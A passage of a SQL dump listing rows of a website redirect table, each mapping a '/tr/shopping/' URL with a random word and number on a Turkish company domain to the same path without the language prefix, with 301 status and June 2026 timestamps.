00:00:00',301),(73427,'https://3s-technologies.com.tr/tr/shopping/haustellata/3377025675.html',NULL,'https://3s-technologies.com.tr/shopping/haustellata/3377025675.html','',1,0,'2026-06-11 05:41:28','0000-00-00 00:00:00',301),(73428,'https://3s-technologies.com.tr/tr/shopping/tungreat/384174601.html',NULL,'https://3s-technologies.com.tr/shopping/tungreat/384174601.html','',1,0,'2026-06-11 05:41:31','0000-00-00 00:00:00',301),(73429,'https://3s-technologies.com.tr/tr/shopping/carphology/2560945637.html',NULL,'https://3s-technologies.com.tr/shopping/carphology/2560945637.html','',1,0,'2026-06-11 05:41:56','0000-00-00 00:00:00',301),(73430,'https://3s-technologies.com.tr/tr/shopping/helicotrema/2621089138.html',NULL,'https://3s-technologies.com.tr/shopping/helicotrema/2621089138.html','',1,0,'2026-06-11 05:41:58','0000-00-00 00:00:00',301),(73431,'https://3s-technologies.com.tr/tr/shopping/oxyphenic/3103975821.html',NULL,'https://3s-technologies.com.tr/shopping/oxyphenic/3103975821.html','',1,0,'2026-06-11 05:42:01','0000-00-00 00:00:00',301),(73432,'https://3s-technologies.com.tr/tr/shopping/obliviously/3347816913.html',NULL,'https://3s-technologies.com.tr/shopping/obliviously/3347816913.html','',1,0,'2026-06-11 05:42:09','0000-00-00 00:00:00',301),(73433,'https://3s-technologies.com.tr/tr/shopping/ophiurid/1020945095.html',NULL,'https://3s-technologies.com.tr/shopping/ophiurid/1020945095.html','',1,0,'2026-06-11 05:42:12','0000-00-00 00:00:00',301),(73434,'https://3s-technologies.com.tr/tr/shopping/manstealer/1478394887.html',NULL,'https://3s-technologies.com.tr/shopping/manstealer/1478394887.html','',1,0,'2026-06-11 05:42:15','0000-00-00 00:00:00',301),(73435,'https://3s-technologies.com.tr/tr/shopping/favorable/2410812181.html',NULL,'https://3s-technologies.com.tr/shopping/favorable/2410812181.html','',1,0,'2026-06-11 05:42:40','0000-00-00 00:00:00',301),(73436,'https://3s-technologies.com.tr/tr/shopping/lacrimatory/3852157024.html',NULL,'https://3s-technologies.com.tr/shopping/lacrimatory/3852157024.html','',1,0,'2026-06-11 05:42:42','0000-00-00 00:00:00',301),(73437,'https://3s-technologies.com.tr/tr/shopping/fraischeur/3073179898.html',NULL,'https://3s-technologies.com.tr/shopping/fraischeur/3073179898.html','',1,0,'2026-06-11 05:42:45','0000-00-00 00:00:00',301),(73438,'https://3s-technologies.com.tr/tr/shopping/balsamiferous/2667926953.html',NULL,'https://3s-technologies.com.tr/shopping/balsamiferous/2667926953.html','',1,0,'2026-06-11 05:42:51','0000-00-00 00:00:00',301),(73439,'https://3s-technologies.com.tr/tr/shopping/pilosella/4110166042.html',NULL,'https://3s-technologies.com.tr/shopping/pilosella/4110166042.html','',1,0,'2026-06-11 05:42:54','0000-00-00 00:00:00',301),(73440,'https://3s-technologies.com.tr/tr/shopping/everliving/1643951131.html',NULL,'https://3s-technologies.com.tr/shopping/everliving/1643951131.html','',1,0,'2026-06-11 05:42:57','0000-00-00 00:00:00',301),(73441,'https://3s-technologies.com.tr/tr/shopping/anomura/2705596194.html',NULL,'https://3s-technologies.com.tr/shopping/anomura/2705596194.html','',1,0,'2026-06-11 05:43:20','0000-00-00 00:00:00',301),(73442,'https://3s-technologies.com.tr/tr/shopping/woody/2814312784.html',NULL,'https://3s-technologies.com.tr/shopping/woody/2814312784.html','',1,0,'2026-06-11 05:43:22','0000-00-00 00:00:00',301),(73443,'https://3s-technologies.com.tr/tr/shopping/marionette/3656163838.html',NULL,'https://3s-technologies.com.tr/shopping/marionette/3656163838.html','',1,0,'2026-06-11 05:43:25','0000-00-00 00:00:00',301),(73444,'https://3s-technologies.com.tr/tr/shopping/awakenment/2866588257.html',NULL,'https://3s-technologies.com.tr/shopping/awakenment/2866588257.html','',1,0,'2026-06-11 05:44:01','0000-00-00 00:00:00',301),(73445,'https://3s-technologies.com.tr/tr/shopping/angiopathy/1204171571.html',NULL,'https://3s-technologies.com.tr/shopping/angiopathy/1204171571.html','',1,0,'2026-06-11 05:44:03','0000-00-00 00:00:00',301),(73446,'https://3s-technologies.com.tr/tr/shopping/constrictive/239787237.html',NULL,'https://3s-technologies.com.tr/shopping/constrictive/239787237.html','',1,0,'2026-06-11 05:44:13','0000-00-00 00:00:00',301),(73447,'https://3s-technologies.com.tr/tr/shopping/decomplex/1422424.html',NULL,'https://3s-technologies.com.tr/shopping/decomplex/1422424.html','',1,0,'2026-06-11 05:44:15','0000-00-00 00:00:00',301),(73448,'https://3s-technologies.com.tr/tr/shopping/stringer/1723787170.html',NULL,'https://3s-technologies.com.tr/shopping/stringer/1723787170.html','',1,0,'2026-06-11 05:44:18','0000-00-00 00:00:00',301),(73449,'https://3s-technologies.com.tr/tr/shopping/aphredoderus/2089129482.html',NULL,'https://3s-technologies.com.tr/shopping/aphredoderus/2089129482.html','',1,0,'2026-06-11 05:44:21','0000-00-00 00:00:00',301),(73450,'https://3s-technologies.com.tr/tr/shopping/modify/33312331.html',NULL,'https://3s-technologies.com.tr/shopping/modify/33312331.html','',1,0,'2026-06-11 05:44:24','0000-00-00 00:00:00',301),(73451,'https://3s-technologies.com.tr/tr/shopping/assorting/600055767.html',NULL,'https://3s-technologies.com.tr/shopping/assorting/600055767.html','',1,0,'2026-06-11 05:44:27','0000-00-00 00:00:00',301),(73452,'https://3s-technologies.com.tr/tr/shopping/riceshell/1897585416.html',NULL,'https://3s-technologies.com.tr/shopping/riceshell/1897585416.html','',1,0,'2026-06-11 05:44:30','0000-00-00 00:00:00',301),(73453,'https://3s-technologies.com.tr/tr/shopping/plexometer/3455283284.html',NULL,'https://3s-technologies.com.tr/shopping/plexometer/3455283284.html','',1,0,'2026-06-11 05:44:33','0000-00-00 00:00:00',301),(73454,'https://3s-technologies.com.tr/tr/shopping/devoutly/2061483053.html',NULL,'https://3s-technologies.com.tr/shopping/devoutly/2061483053.html','',1,0,'2026-06-11 05:44:36','0000-00-00 00:00:00',301),(73455,'https://3s-technologies.com.tr/tr/shopping/exampleless/4252687879.html',NULL,'https://3s-technologies.com.tr/shopping/exampleless/4252687879.html','',1,0,'2026-06-11 05:44:39','0000-00-00 00:00:00',301),(73456,'https://3s-technologies.com.tr/tr/shopping/plenum/2863943149.html',NULL,'https://3s-technologies.com.tr/shopping/plenum/2863943149.html','',1,0,'2026-06-11 05:44:42','0000-00-00 00:00:00',301),(73457,'https://3s-technologies.com.tr/tr/shopping/sooting/529332175.html',NULL,'https://3s-technologies.com.tr/shopping/sooting/529332175.html','',1,0,'2026-06-11 05:44:45','0000-00-00 00:00:00',301),(73458,'https://3s-technologies.com.tr/tr/shopping/misregulate/2184663988.html',NULL,'https://3s-technologies.com.tr/shopping/misregulate/2184663988.html','',1,0,'2026-06-11 05:44:49','0000-00-00 00:00:00',301),(73459,'https://3s-technologies.com.tr/tr/shopping/considerable/765721959.html',NULL,'https://3s-technologies.com.tr/shopping/considerable/765721959.html','',1,0,'2026-06-11 05:44:52','0000-00-00 00:00:00',301),(73460,'https://3s-technologies.com.tr/tr/shopping/cersopithecus/1360260066.html',NULL,'https://3s-technologies.com.tr/shopping/cersopithecus/1360260066.html','',1,0,'2026-06-11 05:44:55','0000-00-00 00:00:00',301),(73461,'https://3s-technologies.com.tr/tr/shopping/caucusing/3593091917.html',NULL,'https://3s-technologies.com.tr/shopping/caucusing/3593091917.html','',1,0,'2026-06-11 05:44:58','0000-00-00 00:00:00',301),(73462,'https://3s-technologies.com.tr/tr/shopping/willingly/3710610202.html',NULL,'https://3s-technologies.com.tr/shopping/willingly/3710610202.html','',1,0,'2026-06-11 05:45:00','0000-00-00 00:00:00',301),(73463,'https://3s-technologies.com.tr/tr/shopping/overstatement/4079614897.html',NULL,'https://3s-technologies.com.tr/shopping/overstatement/4079614897.html','',1,0,'2026-06-11 05:45:03','0000-00-00 00:00:00',301),(73464,'https://3s-technologies.com.tr/tr/shopping/regulating/562412596.html',NULL,'https://3s-technologies.com.tr/shopping/regulating/562412596.html','',1,0,'2026-06-11 05:45:07','0000-00-00 00:00:00',301),(73465,'https://3s-technologies.com.tr/tr/shopping/cascaron/633503115.html',NULL,'https://3s-technologies.com.tr/shopping/cascaron/633503115.html','',1,0,'2026-06-11 05:45:09','0000-00-00 00:00:00',301),(73466,'https://3s-technologies.com.tr/tr/shopping/advisedness/2551054908.html',NULL,'https://3s-technologies.com.tr/shopping/advisedness/2551054908.html','',1,0,'2026-06-11 05:45:13','0000-00-00 00:00:00',301),(73467,'https://3s-technologies.com.tr/tr/shopping/impunctuality/68972731.html',NULL,'https://3s-technologies.com.tr/shopping/impunctuality/68972731.html','',1,0,'2026-06-11 05:45:15','0000-00-00 00:00:00',301),(73468,'https://3s-technologies.com.tr/tr/shopping/petulantly/4077190699.html',NULL,'https://3s-technologies.com.tr/shopping/petulantly/4077190699.html','',1,0,'2026-06-11 05:45:18','0000-00-00 00:00:00',301),(73469,'https://3s-technologies.com.tr/tr/shopping/current/226068496.html',NULL,'https://3s-technologies.com.tr/shopping/current/226068496.html','',1,0,'2026-06-11 05:45:21','0000-00-00 00:00:00',301),(73470,'https://3s-technologies.com.tr/tr/shopping/control/2280467889.html',NULL,'https://3s-technologies.com.tr/shopping/control/2280467889.html','',1,0,'2026-06-11 05:45:25','0000-00-00 00:00:00',301),(73471,'https://3s-technologies.com.tr/tr/shopping/repullulation/2234859225.html',NULL,'https://3s-technologies.com.tr/shopping/repullulation/2234859225.html','',1,0,'2026-06-11 05:45:27','0000-00-00 00:00:00',301),(73472,'https://3s-technologies.com.tr/tr/shopping/scupper/2595874588.html',NULL,'https://3s-technologies.com.tr/shopping/scupper/2595874588.html','',1,0,'2026-06-11 05:45:31','0000-00-00 00:00:00',301),(73473,'https://3s-technologies.com.tr/tr/shopping/chebec/828292712.html',NULL,'https://3s-technologies.com.tr/shopping/chebec/828292712.html','',1,0,'2026-06-11 05:45:34','0000-00-00 00:00:00',301),(73474,'https://3s-technologies.com.tr/tr/shopping/prelatial/3044981608.html',NULL,'https://3s-technologies.com.tr/shopping/prelatial/3044981608.html','',1,0,'2026-06-11 05:45:37','0000-00-00 00:00:00',301),(73475,'https://3s-technologies.com.tr/tr/shopping/extracting/2227682732.html',NULL,'https://3s-technologies.com.tr/shopping/extracting/2227682732.html','',1,0,'2026-06-11 05:45:40','0000-00-00 00:00:00',301),(73476,'https://3s-technologies.com.tr/tr/shopping/affriction/899383231.html',NULL,'https://3s-technologies.com.tr/shopping/affriction/899383231.html','',1,0,'2026-06-11 05:45:43','0000-00-00 00:00:00',301),(73477,'https://3s-technologies.com.tr/tr/shopping/backbench/806956019.html',NULL,'https://3s-technologies.com.tr/shopping/backbench/806956019.html','',1,0,'2026-06-11 05:45:46','0000-00-00 00:00:00',301),(73478,'https://3s-technologies.com.tr/tr/shopping/amorphous/878046522.html',NULL,'https://3s-technologies.com.tr/shopping/amorphous/878046522.html','',1,0,'2026-06-11 05:45:49','0000-00-00 00:00:00',301),(73479,'https://3s-technologies.com.tr/tr/shopping/distributed/42442300.html',NULL,'https://3s-technologies.com.tr/shopping/distributed/42442300.html','',1,0,'2026-06-11 05:45:52','0000-00-00 00:00:00',301),(73480,'https://3s-technologies.com.tr/tr/shopping/coverage/3717527119.html',NULL,'https://3s-technologies.com.tr/shopping/coverage/3717527119.html','',1,0,'2026-06-11 05:45:55','0000-00-00 00:00:00',301),(73481,'https://3s-technologies.com.tr/tr/shopping/versify/413845107.html',NULL,'https://3s-technologies.com.tr/shopping/versify/413845107.html','',1,0,'2026-06-11 05:45:58','0000-00-00 00:00:00',301),(73482,'https://3s-technologies.com.tr/tr/shopping/overvaluing/1286020085.html',NULL,'https://3s-technologies.com.tr/shopping/overvaluing/1286020085.html','',1,0,'2026-06-11 05:46:00','0000-00-00 00:00:00',301),(73483,'https://3s-technologies.com.tr/tr/shopping/clouterly/849187978.html',NULL,'https://3s-technologies.com.tr/shopping/clouterly/849187978.html','',1,0,'2026-06-11 05:46:03','0000-00-00 00:00:00',301),(73484,'https://3s-technologies.com.tr/tr/shopping/constringent/1250148571.html',NULL,'https://3s-technologies.com.tr/shopping/constringent/1250148571.html','',1,0,'2026-06-11 05:46:07','0000-00-00 00:00:00',301),(73485,'https://3s-technologies.com.tr/tr/shopping/lowly/7386850.html',NULL,'https://3s-technologies.com.tr/shopping/lowly/7386850.html','',1,0,'2026-06-11 05:46:10','0000-00-00 00:00:00',301),(73486,'https://3s-technologies.com.tr/tr/shopping/ascaphus/210325.html',NULL,'https://3s-technologies.com.tr/shopping/ascaphus/210325.html','',1,0,'2026-06-11 05:46:13','0000-00-00 00:00:00',301),(73487,'https://3s-technologies.com.tr/tr/shopping/similize/4254852469.html',NULL,'https://3s-technologies.com.tr/shopping/similize/4254852469.html','',1,0,'2026-06-11 05:46:16','0000-00-00 00:00:00',301),(73488,'https://3s-technologies.com.tr/tr/shopping/basinet/75889632.html',NULL,'https://3s-technologies.com.tr/shopping/basinet/75889632.html','',1,0,'2026-06-11 05:46:19','0000-00-00 00:00:00',301),(73489,'https://3s-technologies.com.tr/tr/shopping/harmonize/3180970993.html',NULL,'https://3s-technologies.com.tr/shopping/harmonize/3180970993.html','',1,0,'2026-06-11 05:46:24','0000-00-00 00:00:00',301),(73490,'https://3s-technologies.com.tr/tr/shopping/voidness/3811406668.html',NULL,'https://3s-technologies.com.tr/shopping/voidness/3811406668.html','',1,0,'2026-06-11 05:46:27','0000-00-00 00:00:00',301),(73491,'https://3s-technologies.com.tr/tr/shopping/oxidate/40277710.html',NULL,'https://3s-technologies.com.tr/shopping/oxidate/40277710.html','',1,0,'2026-06-11 05:46:30','0000-00-00 00:00:00',301),(73492,'https://3s-technologies.com.tr/tr/shopping/jocularity/4023075328.html',NULL,'https://3s-technologies.com.tr/shopping/jocularity/4023075328.html','',1,0,'2026-06-11 05:46:33','0000-00-00 00:00:00',301),(73493,'https://3s-technologies.com.tr/tr/shopping/loafing/3272869187.html',NULL,'https://3s-technologies.com.tr/shopping/loafing/3272869187.html','',1,0,'2026-06-11 05:46:36','0000-00-00 00:00:00',301),(73494,'https://3s-technologies.com.tr/tr/shopping/phylum/3060075987.html',NULL,'https://3s-technologies.com.tr/shopping/phylum/3060075987.html','',1,0,'2026-06-11 05:46:39','0000-00-00 00:00:00',301),(73495,'https://3s-technologies.com.tr/tr/shopping/latinity/27511428.html',NULL,'https://3s-technologies.com.tr/shopping/latinity/27511428.html','',1,0,'2026-06-11 05:46:42','0000-00-00 00:00:00',301),(73496,'https://3s-technologies.com.tr/tr/shopping/uranometry/3964095448.html',NULL,'https://3s-technologies.com.tr/shopping/uranometry/3964095448.html','',1,0,'2026-06-11 05:46:45','0000-00-00 00:00:00',301),(73497,'https://3s-technologies.com.tr/tr/shopping/bangle/3844854000.html',NULL,'https://3s-technologies.com.tr/shopping/bangle/3844854000.html','',1,0,'2026-06-11 05:46:48','0000-00-00 00:00:00',301),(73498,'https://3s-technologies.com.tr/tr/shopping/interdependence/2254378869.html',NULL,'https://3s-technologies.com.tr/shopping/interdependence/2254378869.html','',1,0,'2026-06-11 05:46:51','0000-00-00 00:00:00',301),(73499,'https://3s-technologies.com.tr/tr/shopping/brawler/4226157448.html',NULL,'https://3s-technologies.com.tr/shopping/brawler/4226157448.html','',1,0,'2026-06-11 05:46:54','0000-00-00 00:00:00',301),(73500,'https://3s-technologies.com.tr/tr/shopping/scient/1731916154.html',NULL,'https://3s-technologies.com.tr/shopping/scient/1731916154.html','',1,0,'2026-06-11 05:46:57','0000-00-00 00:00:00',301),(73501,'https://3s-technologies.com.tr/tr/shopping/nogging/3562855552.html',NULL,'https://3s-technologies.com.tr/shopping/nogging/3562855552.html','',1,0,'2026-06-11 05:47:00','0000-00-00 00:00:00',301),(73502,'https://3s-technologies.com.tr/tr/shopping/acknowledge/528379668.html',NULL,'https://3s-technologies.com.tr/shopping/acknowledge/528379668.html','',1,0,'2026-06-11 05:47:03','0000-00-00 00:00:00',301),(73503,'https://3s-technologies.com.tr/tr/shopping/compeller/2353937182.html',NULL,'https://3s-technologies.com.tr/shopping/compeller/2353937182.html','',1,0,'2026-06-11 05:47:06','0000-00-00 00:00:00',301),(73504,'https://3s-technologies.com.tr/tr/shopping/virgin/3693862297.html',NULL,'https://3s-technologies.com.tr/shopping/virgin/3693862297.html','',1,0,'2026-06-11 05:47:09','0000-00-00 00:00:00',301),(73505,'https://3s-technologies.com.tr/tr/shopping/hypocritely/171284455.html',NULL,'https://3s-technologies.com.tr/shopping/hypocritely/171284455.html','',1,0,'2026-06-11 05:47:12','0000-00-00 00:00:00',301),(73506,'https://3s-technologies.com.tr/tr/shopping/trepidity/2062858659.html',NULL,'https://3s-technologies.com.tr/shopping/trepidity/2062858659.html','',1,0,'2026-06-11 05:47:15','0000-00-00 00:00:00',301),(73507,'https://3s-technologies.com.tr/tr/shopping/quizzing/2467032417.html',NULL,'https://3s-technologies.com.tr/shopping/quizzing/2467032417.html','',1,0,'2026-06-11 05:47:19','0000-00-00 00:00:00',301),(73508,'https://3s-technologies.com.tr/tr/shopping/fullness/2376649481.html',NULL,'https://3s-technologies.com.tr/shopping/fullness/2376649481.html','',1,0,'2026-06-11 05:47:21','0000-00-00 00:00:00',301),(73509,'https://3s-technologies.com.tr/tr/shopping/pliform/3012650306.html',NULL,'https://3s-technologies.com.tr/shopping/pliform/3012650306.html','',1,0,'2026-06-11 05:47:24','0000-00-00 00:00:00',301),(73510,'https://3s-technologies.com.tr/tr/shopping/nonjuring/1504474504.html',NULL,'https://3s-technologies.com.tr/shopping/nonjuring/1504474504.html','',1,0,'2026-06-11 05:47:27','0000-00-00 00:00:00',301),(73511,'https://3s-technologies.com.tr/tr/shopping/prolong/798612819.html',NULL,'https://3s-technologies.com.tr/shopping/prolong/798612819.html','',1,0,'2026-06-11 05:47:30','0000-00-00 00:00:00',301),(73512,'https://3s-technologies.com.tr/tr/shopping/grotesque/1801567331.html',NULL,'https://3s-technologies.com.tr/shopping/grotesque/1801567331.html','',1,0,'2026-06-11 05:47:33','0000-00-00 00:00:00',301),(73513,'https://3s-technologies.com.tr/tr/shopping/fructescence/812920445.html',NULL,'https://3s-technologies.com.tr/shopping/fructescence/812920445.html','',1,0,'2026-06-11 05:47:36','0000-00-00 00:00:00',301),(73514,'https://3s-technologies.com.tr/tr/shopping/decisive/2055682150.html',NULL,'https://3s-technologies.com.tr/shopping/decisive/2055682150.html','',1,0,'2026-06-11 05:47:39','0000-00-00 00:00:00',301),(73515,'https://3s-technologies.com.tr/tr/shopping/evolutionist/1550688102.html',NULL,'https://3s-technologies.com.tr/shopping/evolutionist/1550688102.html','',1,0,'2026-06-11 05:47:42','0000-00-00 00:00:00',301),(73516,'https://3s-technologies.com.tr/tr/shopping/heavy/4152879377.html',NULL,'https://3s-technologies.com.tr/shopping/heavy/4152879377.html','',1,0,'2026-06-11 05:47:47','0000-00-00 00:00:00',301),(73517,'https://3s-technologies.com.tr/tr/shopping/seawalled/779709727.html',NULL,'https://3s-technologies.com.tr/shopping/seawalled/779709727.html','',1,0,'2026-06-11 05:47:49','0000-00-00 00:00:00',301),(73518,'https://3s-technologies.com.tr/tr/shopping/intellected/3007897995.html',NULL,'https://3s-technologies.com.tr/shopping/intellected/3007897995.html','',1,0,'2026-06-11 05:47:52','0000-00-00 00:00:00',301),(73519,'https://3s-technologies.com.tr/tr/shopping/triander/381741016.html',NULL,'https://3s-technologies.com.tr/shopping/triander/381741016.html','',1,0,'2026-06-11 05:47:55','0000-00-00 00:00:00',301),(73520,'https://3s-technologies.com.tr/tr/shopping/woolwardgoing/23971232.html',NULL,'https://3s-technologies.com.tr/shopping/woolwardgoing/23971232.html','',1,0,'2026-06-11 05:47:58','0000-00-00 00:00:00',301),(73521,'https://3s-technologies.com.tr/tr/shopping/supplying/262499568.html',NULL,'https://3s-technologies.com.tr/shopping/supplying/262499568.html','',1,0,'2026-06-11 05:48:01','0000-00-00 00:00:00',301),(73522,'https://3s-technologies.com.tr/tr/shopping/leeangle/4007539522.html',NULL,'https://3s-technologies.com.tr/shopping/leeangle/4007539522.html','',1,0,'2026-06-11 05:48:04','0000-00-00 00:00:00',301),(73523,'https://3s-technologies.com.tr/tr/shopping/matzos/538747806.html',NULL,'https://3s-technologies.com.tr/shopping/matzos/538747806.html','',1,0,'2026-06-11 05:48:07','0000-00-00 00:00:00',301),(73524,'https://3s-technologies.com.tr/tr/shopping/ichthyography/3341631577.html',NULL,'https://3s-technologies.com.tr/shopping/ichthyography/3341631577.html','',1,0,'2026-06-11 05:48:10','0000-00-00 00:00:00',301),(73525,'https://3s-technologies.com.tr/tr/shopping/baize/1924445092.html',NULL,'https://3s-technologies.com.tr/shopping/baize/1924445092.html','',1,0,'2026-06-11 05:48:13','0000-00-00 00:00:00',301),(73526,'https://3s-technologies.com.tr/tr/shopping/fermented/742057169.html',NULL,'https://3s-technologies.com.tr/shopping/fermented/742057169.html','',1,0,'2026-06-11 05:48:16','0000-00-00 00:00:00',301),(73527,'https://3s-technologies.com.tr/tr/shopping/closereefed/3719951301.html',NULL,'https://3s-technologies.com.tr/shopping/closereefed/3719951301.html','',1,0,'2026-06-11 05:48:19','0000-00-00 00:00:00',301),(73528,'https://3s-technologies.com.tr/tr/shopping/jeopardize/4111850130.html',NULL,'https://3s-technologies.com.tr/shopping/jeopardize/4111850130.html','',1,0,'2026-06-11 05:48:22','0000-00-00 00:00:00',301),(73529,'https://3s-technologies.com.tr/tr/shopping/interrupter/72349420.html',NULL,'https://3s-technologies.com.tr/shopping/interrupter/72349420.html','',1,0,'2026-06-11 05:48:25','0000-00-00 00:00:00',301),(73530,'https://3s-technologies.com.tr/tr/shopping/stumbling/145800417.html',NULL,'https://3s-technologies.com.tr/shopping/stumbling/145800417.html','',1,0,'2026-06-11 05:48:28','0000-00-00 00:00:00',301),(73531,'https://3s-technologies.com.tr/tr/shopping/adangle/2351772592.html',NULL,'https://3s-technologies.com.tr/shopping/adangle/2351772592.html','',1,0,'2026-06-11 05:48:31','0000-00-00 00:00:00',301),(73532,'https://3s-technologies.com.tr/tr/shopping/localisation/3716315020.html',NULL,'https://3s-technologies.com.tr/shopping/localisation/3716315020.html','',1,0,'2026-06-11 05:48:34','0000-00-00 00:00:00',301),(73533,'https://3s-technologies.com.tr/tr/shopping/outcasting/2841672245.html',NULL,'https://3s-technologies.com.tr/shopping/outcasting/2841672245.html','',1,0,'2026-06-11 05:48:37','0000-00-00 00:00:00',301),(73534,'https://3s-technologies.com.tr/tr/shopping/bitingly/1775919754.html',NULL,'https://3s-technologies.com.tr/shopping/bitingly/1775919754.html','',1,0,'2026-06-11 05:48:40','0000-00-00 00:00:00',301),(73535,'https://3s-technologies.com.tr/tr/shopping/scabious/2692869019.html',NULL,'https://3s-technologies.com.tr/shopping/scabious/2692869019.html','',1,0,'2026-06-11 05:48:43','0000-00-00 00:00:00',301),(73536,'https://3s-technologies.com.tr/tr/shopping/monometer/1381155316.html',NULL,'https://3s-technologies.com.tr/shopping/monometer/1381155316.html','',1,0,'2026-06-11 05:48:46','0000-00-00 00:00:00',301),(73537,'https://3s-technologies.com.tr/tr/shopping/homophobic/3712774792.html',NULL,'https://3s-technologies.com.tr/shopping/homophobic/3712774792.html','',1,0,'2026-06-11 05:48:49','0000-00-00 00:00:00',301),(73538,'https://3s-technologies.com.tr/tr/shopping/uncustomed/119333674.html',NULL,'https://3s-technologies.com.tr/shopping/uncustomed/119333674.html','',1,0,'2026-06-11 05:48:52','0000-00-00 00:00:00',301),(73539,'https://3s-technologies.com.tr/tr/shopping/standpipe/3010322193.html',NULL,'https://3s-technologies.com.tr/shopping/standpipe/3010322193.html','',1,0,'2026-06-11 05:49:00','0000-00-00 00:00:00',301),(73540,'https://3s-technologies.com.tr/tr/shopping/titularly/3490552934.html',NULL,'https://3s-technologies.com.tr/shopping/titularly/3490552934.html','',1,0,'2026-06-11 05:49:03','0000-00-00 00:00:00',301),(73541,'https://3s-technologies.com.tr/tr/shopping/colla/1560029217.html',NULL,'https://3s-technologies.com.tr/shopping/colla/1560029217.html','',1,0,'2026-06-11 05:49:06','0000-00-00 00:00:00',301),(73542,'https://3s-technologies.com.tr/tr/shopping/highmen/1306144679.html',NULL,'https://3s-technologies.com.tr/shopping/highmen/1306144679.html','',1,0,'2026-06-11 05:49:09','0000-00-00 00:00:00',301),(73543,'https://3s-technologies.com.tr/tr/shopping/countour/585732076.html',NULL,'https://3s-technologies.com.tr/shopping/countour/585732076.html','',1,0,'2026-06-11 05:49:12','0000-00-00 00:00:00',301),(73544,'https://3s-technologies.com.tr/tr/shopping/coreid/1358095460.html',NULL,'https://3s-technologies.com.tr/shopping/coreid/1358095460.html','',1,0,'2026-06-11 05:49:15','0000-00-00 00:00:00',301),(73545,'https://3s-technologies.com.tr/tr/shopping/macroura/1214929598.html',NULL,'https://3s-technologies.com.tr/shopping/macroura/1214929598.html','',1,0,'2026-06-11 05:49:18','0000-00-00 00:00:00',301),(73546,'https://3s-technologies.com.tr/tr/shopping/monicker/483723511.html',NULL,'https://3s-technologies.com.tr/shopping/monicker/483723511.html','',1,0,'2026-06-11 05:49:21','0000-00-00 00:00:00',301),(73547,'https://3s-technologies.com.tr/tr/shopping/futilous/74937125.html',NULL,'https://3s-technologies.com.tr/shopping/futilous/74937125.html','',1,0,'2026-06-11 05:49:24','0000-00-00 00:00:00',301),(73548,'https://3s-technologies.com.tr/tr/shopping/excoriate/494276709.html',NULL,'https://3s-technologies.com.tr/shopping/excoriate/494276709.html','',1,0,'2026-06-11 05:49:27','0000-00-00 00:00:00',301),(73549,'https://3s-technologies.com.tr/tr/shopping/yieldance/3061288086.html',NULL,'https://3s-technologies.com.tr/shopping/yieldance/3061288086.html','',1,0,'2026-06-11 05:49:34','0000-00-00 00:00:00',301),(73550,'https://3s-technologies.com.tr/tr/shopping/apocryphalness/2010907878.html',NULL,'https://3s-technologies.com.tr/shopping/apocryphalness/2010907878.html','',1,0,'2026-06-11 05:49:39','0000-00-00 00:00:00',301),(73551,'https://3s-technologies.com.tr/tr/shopping/haunted/726310217.html',NULL,'https://3s-technologies.com.tr/shopping/haunted/726310217.html','',1,0,'2026-06-11 05:49:42','0000-00-00 00:00:00',301),(73552,'https://3s-technologies.com.tr/tr/shopping/forcedly/1630752809.html',NULL,'https://3s-technologies.com.tr/shopping/forcedly/1630752809.html','',1,0,'2026-06-11 05:49:45','0000-00-00 00:00:00',301),(73553,'https://3s-technologies.com.tr/tr/shopping/prostitutor/453652868.html',NULL,'https://3s-technologies.com.tr/shopping/prostitutor/453652868.html','',1,0,'2026-06-11 05:49:48','0000-00-00 00:00:00',301),(73554,'https://3s-technologies.com.tr/tr/shopping/nonextant/2446137151.html',NULL,'https://3s-technologies.com.tr/shopping/nonextant/2446137151.html','',1,0,'2026-06-11 05:49:51','0000-00-00 00:00:00',301),(73555,'https://3s-technologies.com.tr/tr/shopping/robustus/1009062686.html',NULL,'https://3s-technologies.com.tr/shopping/robustus/1009062686.html','',1,0,'2026-06-11 05:49:54','0000-00-00 00:00:00',301),(73556,'https://3s-technologies.com.tr/tr/shopping/climatizing/923655186.html',NULL,'https://3s-technologies.com.tr/shopping/climatizing/923655186.html','',1,0,'2026-06-11 05:49:57','0000-00-00 00:00:00',301),(73557,'https://3s-technologies.com.tr/tr/shopping/blitz/781874317.html',NULL,'https://3s-technologies.com.tr/shopping/blitz/781874317.html','',1,0,'2026-06-11 05:50:00','0000-00-00 00:00:00',301),(73558,'https://3s-technologies.com.tr/tr/shopping/klinometer/3482209734.html',NULL,'https://3s-technologies.com.tr/shopping/klinometer/3482209734.html','',1,0,'2026-06-11 05:50:03','0000-00-00 00:00:00',301),(73559,'https://3s-technologies.com.tr/tr/shopping/tallowfaced/3418295756.html',NULL,'https://3s-technologies.com.tr/shopping/tallowfaced/3418295756.html','',1,0,'2026-06-11 05:50:06','0000-00-00 00:00:00',301),(73560,'https://3s-technologies.com.tr/tr/shopping/goofproof/3023644915.html',NULL,'https://3s-technologies.com.tr/shopping/goofproof/3023644915.html','',1,0,'2026-06-11 05:50:09','0000-00-00 00:00:00',301),(73561,'https://3s-technologies.com.tr/tr/shopping/smooth/3063452676.html',NULL,'https://3s-technologies.com.tr/shopping/smooth/3063452676.html','',1,0,'2026-06-11 05:50:12','0000-00-00 00:00:00',301),(73562,'https://3s-technologies.com.tr/tr/shopping/feculent/898067334.html',NULL,'https://3s-technologies.com.tr/shopping/feculent/898067334.html','',1,0,'2026-06-11 05:50:15','0000-00-00 00:00:00',301),(73563,'https://3s-technologies.com.tr/tr/shopping/klipspringer/3156094072.html',NULL,'https://3s-technologies.com.tr/shopping/klipspringer/3156094072.html','',1,0,'2026-06-11 05:50:18','0000-00-00 00:00:00',301),(73564,'https://3s-technologies.com.tr/tr/shopping/congruity/388763405.html',NULL,'https://3s-technologies.com.tr/shopping/congruity/388763405.html','',1,0,'2026-06-11 05:50:21','0000-00-00 00:00:00',301),(73565,'https://3s-technologies.com.tr/tr/shopping/arbitration/561356323.html',NULL,'https://3s-technologies.com.tr/shopping/arbitration/561356323.html','',1,0,'2026-06-11 05:50:24','0000-00-00 00:00:00',301),(73566,'https://3s-technologies.com.tr/tr/shopping/countenancer/721721429.html',NULL,'https://3s-technologies.com.tr/shopping/countenancer/721721429.html','',1,0,'2026-06-11 05:50:27','0000-00-00 00:00:00',301),(73567,'https://3s-technologies.com.tr/tr/shopping/agglomerating/1239815890.html',NULL,'https://3s-technologies.com.tr/shopping/agglomerating/1239815890.html','',1,0,'2026-06-11 05:50:30','0000-00-00 00:00:00',301),(73568,'https://3s-technologies.com.tr/tr/shopping/dissyllable/1225609311.html',NULL,'https://3s-technologies.com.tr/shopping/dissyllable/1225609311.html','',1,0,'2026-06-11 